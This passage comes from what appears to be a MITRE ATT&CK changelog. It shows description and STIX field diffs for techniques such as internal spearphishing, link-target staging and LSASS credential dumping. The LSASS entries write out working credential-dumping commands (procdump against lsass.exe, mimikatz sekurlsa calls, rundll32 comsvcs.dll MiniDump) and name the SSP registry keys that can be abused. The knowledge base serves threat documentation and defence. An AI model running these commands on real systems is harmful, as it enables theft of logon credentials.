may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.(Citation: Installer Package Scripting Rich Trouton) Using legitimate applications, adversaries have distributed applications with modified installer scripts to execute malicious content. When a user installs the application, they may be required to grant administrative permissions to allow the installation. At the end of the installation process of the legitimate application, content such as macOS `postinstall` scripts can be executed with the inherited elevated permissions. Adversaries can use these scripts to execute a malicious executable or install other malicious components (such as a [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)) with the elevated permissions.(Citation: Application Bundle Manipulation Brandon Dalton)(Citation: wardle evilquest parti)(Citation: Windows AppleJeus GReAT)(Citation: Debian Manual Maintainer Scripts) Depending on the distribution, Linux versions of package installer scripts are sometimes called maintainer scripts or post installation scripts. These scripts can include `preinst`, `postinst`, `prerm`, `postrm` scripts and run as root when executed. For Windows, the Microsoft Installer services uses `.msi` files to manage the installing, updating, and uninstalling of applications. These installation routines may also include instructions to perform additional actions that may be abused by adversaries.(Citation: Microsoft Installation Procedures)
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Microsoft Installation Procedures', 'description': 'Microsoft. (2021, January 7). Installation Procedure Tables Group. Retrieved December 27, 2023.', 'url': 'https://learn.microsoft.com/windows/win32/msi/installation-procedure-tables-group'}
x_mitre_contributorsAlexander Rodchenko

[T1090.001] Proxy: Internal Proxy

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.2.0
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-03-15 00:46:26.598000+00:002024-03-07 14:29:02.408000+00:00
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_platformsNetwork

[T1534] Internal Spearphishing

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description
New Description
t1Adversaries may use internal spearphishing to gain access tot1After they already have access to accounts or systems within
> additional information or exploit other users within the sa> the environment, adversaries may use internal spearphishing
>me organization after they already have access to accounts o> to gain access to additional information or compromise othe
>r systems within the environment. Internal spearphishing is >r users within the same organization. Internal spearphishing
>multi-staged campaign where an email account is owned either> is multi-staged campaign where a legitimate account is init
> by controlling the user's device with previously installed >ially compromised either by controlling the user's device or
>malware or by compromising the account credentials of the us> by compromising the account credentials of the user. Advers
>er. Adversaries attempt to take advantage of a trusted inter>aries may then attempt to take advantage of the trusted inte
>nal account to increase the likelihood of tricking the targe>rnal account to increase the likelihood of tricking more vic
>t into falling for the phish attempt.(Citation: Trend Micro >tims into falling for phish attempts, often incorporating [I
>When Phishing Starts from the Inside 2017)  Adversaries may >mpersonation](https://attack.mitre.org/techniques/T1656).(Ci
>leverage [Spearphishing Attachment](https://attack.mitre.org>tation: Trend Micro - Int SP)  For example, adversaries may 
>/techniques/T1566/001) or [Spearphishing Link](https://attac>leverage [Spearphishing Attachment](https://attack.mitre.org
>k.mitre.org/techniques/T1566/002) as part of internal spearp>/techniques/T1566/001) or [Spearphishing Link](https://attac
>hishing to deliver a payload or redirect to an external site>k.mitre.org/techniques/T1566/002) as part of internal spearp
> to capture credentials through [Input Capture](https://atta>hishing to deliver a payload or redirect to an external site
>ck.mitre.org/techniques/T1056) on sites that mimic email log> to capture credentials through [Input Capture](https://atta
>in interfaces.  There have been notable incidents where inte>ck.mitre.org/techniques/T1056) on sites that mimic login int
>rnal spearphishing has been used. The Eye Pyramid campaign u>erfaces.  Adversaries may also leverage internal chat apps, 
>sed phishing emails with malicious attachments for lateral m>such as Microsoft Teams, to spread malicious content or enga
>ovement between victims, compromising nearly 18,000 email ac>ge users in attempts to capture sensitive information and/or
>counts in the process.(Citation: Trend Micro When Phishing S> credentials.(Citation: Int SP - chat apps)
>tarts from the Inside 2017) The Syrian Electronic Army (SEA) 
> compromised email accounts at the Financial Times (FT) to s 
>teal additional account credentials. Once FT learned of the  
>campaign and began warning employees of the threat, the SEA  
>sent phishing emails mimicking the Financial Times IT depart 
>ment and were able to compromise even more users.(Citation:  
>THE FINANCIAL TIMES LTD 2019.) 
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.2.0
x_mitre_deprecatedFalse
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
values_changed
STIX FieldOld valueNew Value
modified2022-03-08 21:29:30.249000+00:002024-02-16 13:09:39.215000+00:00
descriptionAdversaries may use internal spearphishing to gain access to additional information or exploit other users within the same organization after they already have access to accounts or systems within the environment. Internal spearphishing is multi-staged campaign where an email account is owned either by controlling the user's device with previously installed malware or by compromising the account credentials of the user. Adversaries attempt to take advantage of a trusted internal account to increase the likelihood of tricking the target into falling for the phish attempt.(Citation: Trend Micro When Phishing Starts from the Inside 2017) Adversaries may leverage [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) or [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) as part of internal spearphishing to deliver a payload or redirect to an external site to capture credentials through [Input Capture](https://attack.mitre.org/techniques/T1056) on sites that mimic email login interfaces. There have been notable incidents where internal spearphishing has been used. The Eye Pyramid campaign used phishing emails with malicious attachments for lateral movement between victims, compromising nearly 18,000 email accounts in the process.(Citation: Trend Micro When Phishing Starts from the Inside 2017) The Syrian Electronic Army (SEA) compromised email accounts at the Financial Times (FT) to steal additional account credentials. Once FT learned of the campaign and began warning employees of the threat, the SEA sent phishing emails mimicking the Financial Times IT department and were able to compromise even more users.(Citation: THE FINANCIAL TIMES LTD 2019.)After they already have access to accounts or systems within the environment, adversaries may use internal spearphishing to gain access to additional information or compromise other users within the same organization. Internal spearphishing is multi-staged campaign where a legitimate account is initially compromised either by controlling the user's device or by compromising the account credentials of the user. Adversaries may then attempt to take advantage of the trusted internal account to increase the likelihood of tricking more victims into falling for phish attempts, often incorporating [Impersonation](https://attack.mitre.org/techniques/T1656).(Citation: Trend Micro - Int SP) For example, adversaries may leverage [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) or [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) as part of internal spearphishing to deliver a payload or redirect to an external site to capture credentials through [Input Capture](https://attack.mitre.org/techniques/T1056) on sites that mimic login interfaces. Adversaries may also leverage internal chat apps, such as Microsoft Teams, to spread malicious content or engage users in attempts to capture sensitive information and/or credentials.(Citation: Int SP - chat apps)
external_references[2]['source_name']THE FINANCIAL TIMES LTD 2019.Int SP - chat apps
external_references[2]['description']THE FINANCIAL TIMES. (2019, September 2). A sobering day. Retrieved October 8, 2019.Microsoft Threat Intelligence. (2023, August 2). Midnight Blizzard conducts targeted social engineering over Microsoft Teams. Retrieved February 16, 2024.
external_references[2]['url']https://labs.ft.com/2013/05/a-sobering-day/?mhq5j=e6https://www.microsoft.com/en-us/security/blog/2023/08/02/midnight-blizzard-conducts-targeted-social-engineering-over-microsoft-teams/
x_mitre_version1.21.3
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Trend Micro - Int SP', 'description': 'Trend Micro. (n.d.). Retrieved February 16, 2024.', 'url': 'https://www.trendmicro.com/en_us/research.html'}

[T1003.001] OS Credential Dumping: LSASS Memory

Current version: 1.4

Version changed from: 1.3 → 1.4


Old Description
New Description
t1Adversaries may attempt to access credential material storedt1Adversaries may attempt to access credential material stored
> in the process memory of the Local Security Authority Subsy> in the process memory of the Local Security Authority Subsy
>stem Service (LSASS). After a user logs on, the system gener>stem Service (LSASS). After a user logs on, the system gener
>ates and stores a variety of credential materials in LSASS p>ates and stores a variety of credential materials in LSASS p
>rocess memory. These credential materials can be harvested b>rocess memory. These credential materials can be harvested b
>y an administrative user or SYSTEM and used to conduct [Late>y an administrative user or SYSTEM and used to conduct [Late
>ral Movement](https://attack.mitre.org/tactics/TA0008) using>ral Movement](https://attack.mitre.org/tactics/TA0008) using
> [Use Alternate Authentication Material](https://attack.mitr> [Use Alternate Authentication Material](https://attack.mitr
>e.org/techniques/T1550).  As well as in-memory techniques, t>e.org/techniques/T1550).  As well as in-memory techniques, t
>he LSASS process memory can be dumped from the target host a>he LSASS process memory can be dumped from the target host a
>nd analyzed on a local system.  For example, on the target h>nd analyzed on a local system.  For example, on the target h
>ost use procdump:  * <code>procdump -ma lsass.exe lsass_dump>ost use procdump:  * <code>procdump -ma lsass.exe lsass_dump
></code>  Locally, mimikatz can be run using:  * <code>sekurl></code>  Locally, mimikatz can be run using:  * <code>sekurl
>sa::Minidump lsassdump.dmp</code> * <code>sekurlsa::logonPas>sa::Minidump lsassdump.dmp</code> * <code>sekurlsa::logonPas
>swords</code>  Built-in Windows tools such as comsvcs.dll ca>swords</code>  Built-in Windows tools such as `comsvcs.dll
>n also be used:  * <code>rundll32.exe C:\Windows\System32\co>can also be used:  * <code>rundll32.exe C:\Windows\System32\
>msvcs.dll MiniDump PID  lsass.dmp full</code>(Citation: Vole>comsvcs.dll MiniDump PID  lsass.dmp full</code>(Citation: Vo
>xity Exchange Marauder March 2021)(Citation: Symantec Attack>lexity Exchange Marauder March 2021)(Citation: Symantec Atta
>s Against Government Sector)   Windows Security Support Prov>cks Against Government Sector)  Similar to [Image File Execu
>ider (SSP) DLLs are loaded into LSASS process at system star>tion Options Injection](https://attack.mitre.org/techniques/
>t. Once loaded into the LSA, SSP DLLs have access to encrypt>T1546/012), the silent process exit mechanism can be abused 
>ed and plaintext passwords that are stored in Windows, such >to create a memory dump of `lsass.exe` through Windows Error
>as any logged-on user's Domain password or smart card PINs. > Reporting (`WerFault.exe`).(Citation: Deep Instinct LSASS) 
>The SSP configuration is stored in two Registry keys: <code>> Windows Security Support Provider (SSP) DLLs are loaded int
>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages<>o LSASS process at system start. Once loaded into the LSA, S
>/code> and <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\O>SP DLLs have access to encrypted and plaintext passwords tha
>SConfig\Security Packages</code>. An adversary may modify th>t are stored in Windows, such as any logged-on user's Domain
>ese Registry keys to add new SSPs, which will be loaded the > password or smart card PINs. The SSP configuration is store
>next time the system boots, or when the AddSecurityPackage W>d in two Registry keys: <code>HKLM\SYSTEM\CurrentControlSet\
>indows API function is called.(Citation: Graeber 2014)  The >Control\Lsa\Security Packages</code> and <code>HKLM\SYSTEM\C
>following SSPs can be used to access credentials:  * Msv: In>urrentControlSet\Control\Lsa\OSConfig\Security Packages</cod
>teractive logons, batch logons, and service logons are done >e>. An adversary may modify these Registry keys to add new S
>through the MSV authentication package. * Wdigest: The Diges>SPs, which will be loaded the next time the system boots, or
>t Authentication protocol is designed for use with Hypertext> when the AddSecurityPackage Windows API function is called.
> Transfer Protocol (HTTP) and Simple Authentication Security>(Citation: Graeber 2014)  The following SSPs can be used to 
> Layer (SASL) exchanges.(Citation: TechNet Blogs Credential >access credentials:  * Msv: Interactive logons, batch logons
>Protection) * Kerberos: Preferred for mutual client-server d>, and service logons are done through the MSV authentication
>omain authentication in Windows 2000 and later. * CredSSP:  > package. * Wdigest: The Digest Authentication protocol is d
>Provides SSO and Network Level Authentication for Remote Des>esigned for use with Hypertext Transfer Protocol (HTTP) and 
>ktop Services.(Citation: TechNet Blogs Credential Protection>Simple Authentication Security Layer (SASL) exchanges.(Citat
>>ion: TechNet Blogs Credential Protection) * Kerberos: Prefer
 >red for mutual client-server domain authentication in Window
 >s 2000 and later. * CredSSP:  Provides SSO and Network Level
 > Authentication for Remote Desktop Services.(Citation: TechN
 >et Blogs Credential Protection) 

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2023-07-24 18:52:29.338000+00:002023-12-27 17:57:20.003000+00:00
descriptionAdversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550). As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system. For example, on the target host use procdump: * procdump -ma lsass.exe lsass_dump Locally, mimikatz can be run using: * sekurlsa::Minidump lsassdump.dmp * sekurlsa::logonPasswords Built-in Windows tools such as comsvcs.dll can also be used: * rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump PID lsass.dmp full(Citation: Volexity Exchange Marauder March 2021)(Citation: Symantec Attacks Against Government Sector) Windows Security Support Provider (SSP) DLLs are loaded into LSASS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages and HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014) The following SSPs can be used to access credentials: * Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package. * Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.(Citation: TechNet Blogs Credential Protection) * Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later. * CredSSP: Provides SSO and Network Level Authentication for Remote Desktop Services.(Citation: TechNet Blogs Credential Protection) Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550). As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system. For example, on the target host use procdump: * procdump -ma lsass.exe lsass_dump Locally, mimikatz can be run using: * sekurlsa::Minidump lsassdump.dmp * sekurlsa::logonPasswords Built-in Windows tools such as `comsvcs.dll` can also be used: * rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump PID lsass.dmp full(Citation: Volexity Exchange Marauder March 2021)(Citation: Symantec Attacks Against Government Sector) Similar to [Image File Execution Options Injection](https://attack.mitre.org/techniques/T1546/012), the silent process exit mechanism can be abused to create a memory dump of `lsass.exe` through Windows Error Reporting (`WerFault.exe`).(Citation: Deep Instinct LSASS) Windows Security Support Provider (SSP) DLLs are loaded into LSASS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages and HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014) The following SSPs can be used to access credentials: * Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package. * Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.(Citation: TechNet Blogs Credential Protection) * Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later. * CredSSP: Provides SSO and Network Level Authentication for Remote Desktop Services.(Citation: TechNet Blogs Credential Protection)
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.31.4
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Deep Instinct LSASS', 'description': 'Gilboa, A. (2021, February 16). LSASS Memory Dumps are Stealthier than Ever Before - Part 2. Retrieved December 27, 2023.', 'url': 'https://www.deepinstinct.com/blog/lsass-memory-dumps-are-stealthier-than-ever-before-part-2'}
x_mitre_data_sourcesFile: File Creation

[T1608.005] Stage Capabilities: Link Target

Current version: 1.4

Version changed from: 1.3 → 1.4


Old Description
New Description
t1Adversaries may put in place resources that are referenced bt1Adversaries may put in place resources that are referenced b
>y a link that can be used during targeting. An adversary may>y a link that can be used during targeting. An adversary may
> rely upon a user clicking a malicious link in order to divu> rely upon a user clicking a malicious link in order to divu
>lge information (including credentials) or to gain execution>lge information (including credentials) or to gain execution
>, as in [Malicious Link](https://attack.mitre.org/techniques>, as in [Malicious Link](https://attack.mitre.org/techniques
>/T1204/001). Links can be used for spearphishing, such as se>/T1204/001). Links can be used for spearphishing, such as se
>nding an email accompanied by social engineering text to coa>nding an email accompanied by social engineering text to coa
>x the user to actively click or copy and paste a URL into a >x the user to actively click or copy and paste a URL into a 
>browser. Prior to a phish for information (as in [Spearphish>browser. Prior to a phish for information (as in [Spearphish
>ing Link](https://attack.mitre.org/techniques/T1598/003)) or>ing Link](https://attack.mitre.org/techniques/T1598/003)) or
> a phish to gain initial access to a system (as in [Spearphi> a phish to gain initial access to a system (as in [Spearphi
>shing Link](https://attack.mitre.org/techniques/T1566/002)),>shing Link](https://attack.mitre.org/techniques/T1566/002)),
> an adversary must set up the resources for a link target fo> an adversary must set up the resources for a link target fo
>r the spearphishing link.   Typically, the resources for a l>r the spearphishing link.   Typically, the resources for a l
>ink target will be an HTML page that may include some client>ink target will be an HTML page that may include some client
>-side script such as [JavaScript](https://attack.mitre.org/t>-side script such as [JavaScript](https://attack.mitre.org/t
>echniques/T1059/007) to decide what content to serve to the >echniques/T1059/007) to decide what content to serve to the 
>user. Adversaries may clone legitimate sites to serve as the>user. Adversaries may clone legitimate sites to serve as the
> link target, this can include cloning of login pages of leg> link target, this can include cloning of login pages of leg
>itimate web services or organization login pages in an effor>itimate web services or organization login pages in an effor
>t to harvest credentials during [Spearphishing Link](https:/>t to harvest credentials during [Spearphishing Link](https:/
>/attack.mitre.org/techniques/T1598/003).(Citation: Malwareby>/attack.mitre.org/techniques/T1598/003).(Citation: Malwareby
>tes Silent Librarian October 2020)(Citation: Proofpoint TA40>tes Silent Librarian October 2020)(Citation: Proofpoint TA40
>7 September 2019) Adversaries may also [Upload Malware](http>7 September 2019) Adversaries may also [Upload Malware](http
>s://attack.mitre.org/techniques/T1608/001) and have the link>s://attack.mitre.org/techniques/T1608/001) and have the link
> target point to malware for download/execution by the user.> target point to malware for download/execution by the user.
>  Adversaries may purchase domains similar to legitimate dom>  Adversaries may purchase domains similar to legitimate dom
>ains (ex: homoglyphs, typosquatting, different top-level dom>ains (ex: homoglyphs, typosquatting, different top-level dom
>ain, etc.) during acquisition of infrastructure ([Domains](h>ain, etc.) during acquisition of infrastructure ([Domains](h
>ttps://attack.mitre.org/techniques/T1583/001)) to help facil>ttps://attack.mitre.org/techniques/T1583/001)) to help facil
>itate [Malicious Link](https://attack.mitre.org/techniques/T>itate [Malicious Link](https://attack.mitre.org/techniques/T
>1204/001). Link shortening services can also be employed. Ad>1204/001).  Links can be written by adversaries to mask the 
>versaries may also use free or paid accounts on Platform-as->true destination in order to deceive victims by abusing the 
>a-Service providers to host link targets while taking advant>URL schema and increasing the effectiveness of phishing.(Cit
>age of the widely trusted domains of those providers to avoi>ation: Kaspersky-masking)(Citation: mandiant-masking)  Adver
>d being blocked.(Citation: Netskope GCP Redirection)(Citatio>saries may also use free or paid accounts on link shortening
>n: Netskope Cloud Phishing)(Citation: Intezer App Service Ph> services and Platform-as-a-Service providers to host link t
>ishing) Finally, adversaries may take advantage of the decen>argets while taking advantage of the widely trusted domains 
>tralized nature of the InterPlanetary File System (IPFS) to >of those providers to avoid being blocked while redirecting 
>host link targets that are difficult to remove.(Citation: Ta>victims to malicious pages.(Citation: Netskope GCP Redirecti
>los IPFS 2022)>on)(Citation: Netskope Cloud Phishing)(Citation: Intezer App
 > Service Phishing)(Citation: Cofense-redirect) In addition, 
 >adversaries may serve a variety of malicious links through u
 >niquely generated URIs/URLs.(Citation: iOS URL Scheme)(Citat
 >ion: URI)(Citation: URI Use)(Citation: URI Unique) Finally, 
 >adversaries may take advantage of the decentralized nature o
 >f the InterPlanetary File System (IPFS) to host link targets
 > that are difficult to remove.(Citation: Talos IPFS 2022)
Details
values_changed
STIX FieldOld valueNew Value
modified2023-04-11 23:20:48.603000+00:002024-04-13 14:03:24.673000+00:00
descriptionAdversaries may put in place resources that are referenced by a link that can be used during targeting. An adversary may rely upon a user clicking a malicious link in order to divulge information (including credentials) or to gain execution, as in [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Links can be used for spearphishing, such as sending an email accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser. Prior to a phish for information (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003)) or a phish to gain initial access to a system (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002)), an adversary must set up the resources for a link target for the spearphishing link. Typically, the resources for a link target will be an HTML page that may include some client-side script such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) to decide what content to serve to the user. Adversaries may clone legitimate sites to serve as the link target, this can include cloning of login pages of legitimate web services or organization login pages in an effort to harvest credentials during [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003).(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019) Adversaries may also [Upload Malware](https://attack.mitre.org/techniques/T1608/001) and have the link target point to malware for download/execution by the user. Adversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Link shortening services can also be employed. Adversaries may also use free or paid accounts on Platform-as-a-Service providers to host link targets while taking advantage of the widely trusted domains of those providers to avoid being blocked.(Citation: Netskope GCP Redirection)(Citation: Netskope Cloud Phishing)(Citation: Intezer App Service Phishing) Finally, adversaries may take advantage of the decentralized nature of the InterPlanetary File System (IPFS) to host link targets that are difficult to remove.(Citation: Talos IPFS 2022)Adversaries may put in place resources that are referenced by a link that can be used during targeting. An adversary may rely upon a user clicking a malicious link in order to divulge information (including credentials) or to gain execution, as in [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Links can be used for spearphishing, such as sending an email accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser. Prior to a phish for information (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003)) or a phish to gain initial access to a system (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002)), an adversary must set up the resources for a link target for the spearphishing link. Typically, the resources for a link target will be an HTML page that may include some client-side script such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) to decide what content to serve to the user. Adversaries may clone legitimate sites to serve as the link target, this can include cloning of login pages of legitimate web services or organization login pages in an effort to harvest credentials during [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003).(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019) Adversaries may also [Upload Malware](https://attack.mitre.org/techniques/T1608/001) and have the link target point to malware for download/execution by the user. Adversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Links can be written by adversaries to mask the true destination in order to deceive victims by abusing the URL schema and increasing the effectiveness of phishing.(Citation: Kaspersky-masking)(Citation: mandiant-masking) Adversaries may also use free or paid accounts on link shortening services and Platform-as-a-Service providers to host link targets while taking advantage of the widely trusted domains of those providers to avoid being blocked while redirecting victims to malicious pages.(Citation: Netskope GCP Redirection)(Citation: Netskope Cloud Phishing)(Citation: Intezer App Service Phishing)(Citation: Cofense-redirect) In addition, adversaries may serve a variety of malicious links through uniquely generated URIs/URLs.(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique) Finally, adversaries may take advantage of the decentralized nature of the InterPlanetary File System (IPFS) to host link targets that are difficult to remove.(Citation: Talos IPFS 2022)
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.31.4
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'URI Unique', 'description': 'Australian Cyber Security Centre. National Security Agency. (2020, April 21). Detect and Prevent Web Shell Malware. Retrieved February 9, 2024.', 'url': 'https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF'}
external_references{'source_name': 'Kaspersky-masking', 'description': 'Dedenok, Roman. (2023, December 12). How cybercriminals disguise URLs. Retrieved January 17, 2024.', 'url': 'https://www.kaspersky.com/blog/malicious-redirect-methods/50045/'}
external_references{'source_name': 'URI', 'description': 'Michael Cobb. (2007, October 11). Preparing for uniform resource identifier (URI) exploits. Retrieved February 9, 2024.', 'url': 'https://www.techtarget.com/searchsecurity/tip/Preparing-for-uniform-resource-identifier-URI-exploits'}
external_references{'source_name': 'URI Use', 'description': 'Nathan McFeters. Billy Kim Rios. Rob Carter.. (2008). URI Use and Abuse. Retrieved February 9, 2024.', 'url': 'https://www.blackhat.com/presentations/bh-dc-08/McFeters-Rios-Carter/Presentation/bh-dc-08-mcfeters-rios-carter.pdf'}
external_references{'source_name': 'iOS URL Scheme', 'description': 'Ostorlab. (n.d.). iOS URL Scheme Hijacking. Retrieved February 9, 2024.', 'url': 'https://docs.ostorlab.co/kb/IPA_URL_SCHEME_HIJACKING/index.html'}
external_references{'source_name': 'Cofense-redirect', 'description': 'Raymond, Nathaniel. (2023, August 16). Major Energy Company Targeted in Large QR Code Phishing Campaign. Retrieved January 17, 2024.', 'url': 'https://cofense.com/blog/major-energy-company-targeted-in-large-qr-code-campaign/'}
external_references{'source_name': 'mandiant-masking', 'description': "Simonian, Nick. (2023, May 22). Don't @ Me: URL Obfuscation Through Schema Abuse. Retrieved January 17, 2024.", 'url': 'https://www.mandiant.com/resources/blog/url-obfuscation-schema-abuse'}
x_mitre_contributorsHen Porcilan
x_mitre_contributorsDiyar Saadi Ali
x_mitre_contributorsNikola Kovac

[T1071.003] Application Layer Protocol: Mail Protocols

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may communicate using application layer protocolt1Adversaries may communicate using application layer protocol
>s associated with electronic mail delivery to avoid detectio>s associated with electronic mail delivery to avoid detectio
>n/network filtering by blending in with existing traffic. Co>n/network filtering by blending in with existing traffic. Co
>mmands to the remote system, and often the results of those >mmands to the remote system, and often the results of those 
>commands, will be embedded within the protocol traffic betwe>commands, will be embedded within the protocol traffic betwe
>en the client and server.   Protocols such as SMTP/S, POP3/S>en the client and server.   Protocols such as SMTP/S, POP3/S
>, and IMAP that carry electronic mail may be very common in >, and IMAP that carry electronic mail may be very common in 
>environments.  Packets produced from these protocols may hav>environments.  Packets produced from these protocols may hav
>e many fields and headers in which data can be concealed. Da>e many fields and headers in which data can be concealed. Da
>ta could also be concealed within the email messages themsel>ta could also be concealed within the email messages themsel
>ves. An adversary may abuse these protocols to communicate w>ves. An adversary may abuse these protocols to communicate w
>ith systems under their control within a victim network whil>ith systems under their control within a victim network whil
>e also mimicking normal, expected traffic. >e also mimicking normal, expected traffic.(Citation: FireEye
 > APT28) 
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.2.0
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-10-21 16:35:45.633000+00:002024-04-16 12:28:59.928000+00:00
descriptionAdversaries may communicate using application layer protocols associated with electronic mail delivery to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. Protocols such as SMTP/S, POP3/S, and IMAP that carry electronic mail may be very common in environments. Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the email messages themselves. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. Adversaries may communicate using application layer protocols associated with electronic mail delivery to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. Protocols such as SMTP/S, POP3/S, and IMAP that carry electronic mail may be very common in environments. Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the email messages themselves. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.(Citation: FireEye APT28)
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'FireEye APT28', 'description': 'FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015.', 'url': 'https://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf'}
x_mitre_platformsNetwork

[T1036] Masquerading

Current version: 1.7

Version changed from: 1.6 → 1.7


Old Description
New Description
t1Adversaries may attempt to manipulate features of their artit1Adversaries may attempt to manipulate features of their arti
>facts to make them appear legitimate or benign to users and/>facts to make them appear legitimate or benign to users and/
>or security tools. Masquerading occurs when the name or loca>or security tools. Masquerading occurs when the name or loca
>tion of an object, legitimate or malicious, is manipulated o>tion of an object, legitimate or malicious, is manipulated o
>r abused for the sake of evading defenses and observation. T>r abused for the sake of evading defenses and observation. T
>his may include manipulating file metadata, tricking users i>his may include manipulating file metadata, tricking users i
>nto misidentifying the file type, and giving legitimate task>nto misidentifying the file type, and giving legitimate task
> or service names.  Renaming abusable system utilities to ev> or service names.  Renaming abusable system utilities to ev
>ade security monitoring is also a form of [Masquerading](htt>ade security monitoring is also a form of [Masquerading](htt
>ps://attack.mitre.org/techniques/T1036).(Citation: LOLBAS Ma>ps://attack.mitre.org/techniques/T1036).(Citation: LOLBAS Ma
>in Site) Masquerading may also include the use of [Proxy](ht>in Site)
>tps://attack.mitre.org/techniques/T1090) or VPNs to disguise 
> IP addresses, which can allow adversaries to blend in with  
>normal network traffic and bypass conditional access policie 
>s or anti-abuse protections. 
Details
values_changed
STIX FieldOld valueNew Value
